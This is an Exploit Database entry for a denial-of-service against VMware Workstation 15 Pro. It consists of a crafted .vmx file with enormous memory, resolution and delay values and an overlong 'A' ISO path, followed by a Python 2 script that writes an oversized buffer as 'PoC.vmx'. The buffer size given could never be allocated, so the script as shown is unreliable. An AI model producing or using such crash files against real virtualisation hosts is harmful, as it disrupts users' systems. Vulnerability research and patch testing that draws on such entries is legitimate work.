VMware Workstation 15 Pro – Denial of Service

• Exploit Database
• 15 阅读

• 作者： Milad karimi
  日期： 2023-03-28
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/51100/

• #Title: VMware Workstation 15 Pro - Denial of Service
  #Author: Milad Karimi
  #Date: 2022-10-17
  #Tested on: Windows 10 Pro and Windows 7 Pro (SP1) with VMware® Workstation 15 Pro (15.5.6 build-16341506)
  #Affected: VMware Workstation Pro/Player 15.x
  
  
  config.version = "8"
  virtualHW.version = "4"
  displayName = "credit's to Ex3ptionaL for find this vouln"
  annotation = "Live CD ISO http://www.irongeek.com"
  guestinfo.vmware.product.long = "credit's to Ex3ptionaL for find this vouln"
  guestinfo.vmware.product.url = "http://www.millw0rm.com"
  guestinfo.vmware.product.short = "LCDI"
  guestinfo.vmware.product.version.major = "1"
  guestinfo.vmware.product.version.minor = "0"
  guestinfo.vmware.product.version.revision = "0"
  guestinfo.vmware.product.version.type = "release"
  guestinfo.vmware.product.class = "virtual machine"
  guestinfo.vmware.product.build = "1.0.0rc8-20051212"
  uuid.action = "create"
  guestOS = "winxppro"
  #####
  # Memory
  #####
  memsize = "20000000000000"
  # memsize = "300000000000000000000000000000"
  # memsize = "400000000000000000000"
  # memsize = "700000000000000000000000000000000000"
  #
  # Alternative larger memory allocations
  #####
  # USB
  #####
  usb.present = "TRUE"
  #####
  # Floppy
  #####
  floppy0.present = "FALSE"
  #####
  # IDE Storage
  #####
  ide1:0.present = "TRUE"
  #Edit line below to change ISO to boot from
  ide1:0.fileName = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.iso"
  ide1:0.deviceType = "cdrom-image"
  ide1:0.startConnected = "TRUE"
  ide1:0.autodetect = "TRUE"
  #####
  # Network
  #####
  ethernet0.present = "TRUE"
  ethernet0.connectionType = "nat"
  # ethernet0.connectionType = "bridged"
  #
  # Switch these two to enable "Bridged" vs. "NAT"
  #####
  # Sound
  #####
  sound.present = "TRUE"
  sound.virtualDev = "es1371"
  sound.autoDetect = "TRUE"
  sound.fileName = "-1"
  #####
  # Misc.
  #
  # (normal)  high
  priority.grabbed = "high"
  tools.syncTime = "TRUE"
  workingDir = "."
  #
  # (16)  32  64
  sched.mem.pShare.checkRate = "32"
  #
  # (32)  64  128
  sched.mem.pshare.scanRate = "64"
  #
  # Higher resolution lockout, adjust values to exceed 800x600
  svga.maxWidth = "8000000000000000000"
  svga.maxHeight = "6000000000000000000"
  #
  # (F) T
  isolation.tools.dnd.disable = "FALSE"
  #
  # (F) T
  isolation.tools.hgfs.disable = "FALSE"
  #
  # (F) T
  isolation.tools.copy.disable = "FALSE"
  #
  # (F) T
  isolation.tools.paste.disable = "FALSE"
  #
  # (T) F
  logging = "TRUE"
  #
  #
  # (F) T
  log.append = "FALSE"
  #
  # (3) number of older files kept
  log.keepOld = "1"
  #
  # (0) microseconds
  keyboard.typematicMinDelay = 100000000000000000
  uuid.location = "56 4d f1 ae 7b ed fe a2-e2 0d 49 3d 6d 3c d4 4a"
  uuid.bios = "56 4d f1 ae 7b ed fe a2-e2 0d 49 3d 6d 3c d4 4a"
  ethernet0.addressType = "generated"
  ethernet0.generatedAddress = "00:0c:29:3c:d4:4a"
  ethernet0.generatedAddressOffset = "0"
  checkpoint.vmState = "live-cd-iso.vmss"
  
  tools.remindInstall = "TRUE"
  
  Exploit code()
  
  buffer = "A" * 118000000000000000
  payload = buffer
  try:
      f=open("PoC.vmx","w")
      print "[+] Creating %s evil payload.." %len(payload)
      f.write(payload)
      f.close()
      print "[+] File created!"
  except:
      print "File cannot be created"